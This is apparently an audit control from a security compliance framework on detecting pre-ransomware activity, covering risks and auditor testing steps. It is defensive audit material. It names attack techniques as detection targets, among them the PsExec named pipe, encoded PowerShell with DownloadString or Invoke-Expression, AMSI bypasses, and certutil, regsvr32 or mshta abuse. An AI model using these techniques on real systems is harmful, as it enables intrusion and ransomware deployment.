Do you have detections for the early stages of ransomware (Cobalt Strike, PsExec, abuse of legitimate tools, suspicious PowerShell)?
Demonstrate that the organization has implemented and validated detection capabilities for pre-ransomware attack behaviors including Cobalt Strike frameworks, administrative tool abuse, and suspicious scripting activity.
Description
What this control does
This control requires deployment of detection rules and behavioral analytics to identify early-stage ransomware attack techniques including Cobalt Strike beacon activity, lateral movement via PsExec, living-off-the-land binaries (LOLBins), and malicious PowerShell execution. These indicators represent the reconnaissance, credential access, and lateral movement phases that occur before file encryption. Effective early-stage detection enables incident response teams to contain threats before ransomware payloads execute, preventing widespread encryption and data exfiltration.
Control objective
What auditing this proves
Demonstrate that the organization has implemented and validated detection capabilities for pre-ransomware attack behaviors including Cobalt Strike frameworks, administrative tool abuse, and suspicious scripting activity.
Associated risks
Risks this control addresses
- Undetected Cobalt Strike beacons establish persistent command-and-control channels enabling attackers to maintain access and deploy ransomware payloads
- Lateral movement using PsExec or similar remote execution tools spreads malware across the environment without triggering alerts
- Abuse of legitimate administrative tools (WMI, scheduled tasks, RDP) blends malicious activity with normal operations evading signature-based detection
- Obfuscated or encoded PowerShell commands execute reconnaissance scripts, credential dumping, or payload staging undetected
- Delayed detection allows attackers to escalate privileges and disable backup systems before ransomware deployment
- Living-off-the-land techniques using native Windows utilities (certutil, bitsadmin, rundll32) bypass application whitelisting and antivirus
- Insufficient logging or detection coverage leaves blind spots during the critical pre-encryption phase when containment is most effective
Testing procedure
How an auditor verifies this control
- Obtain the current SIEM, EDR, and network detection rule repository including version numbers and last update dates
- Review detection rules specifically targeting Cobalt Strike indicators such as named pipe IOCs, beacon network patterns, Malleable C2 profiles, and process injection techniques
- Examine rules for PsExec detection including service creation events, named pipe usage (\pipe\psexesvc), and remote ADMIN$ share access patterns
- Analyze PowerShell logging configuration and detection logic covering script block logging (Event ID 4104), execution policy bypasses, encoded commands, suspicious cmdlets (Invoke-Expression, DownloadString), and AMSI bypass attempts
- Verify detection coverage for LOLBin abuse including certutil with URL parameters, wmic process calls, regsvr32 network connections, and mshta execution
- Request evidence of testing or validation for these detection rules including red team exercises, purple team validations, or MITRE ATT&CK emulation results from the past 12 months
- Select a sample of triggered alerts from the past quarter matching these detection categories and trace response actions taken
- Verify alert tuning documentation showing false positive reduction efforts while maintaining detection efficacy for these pre-ransomware indicators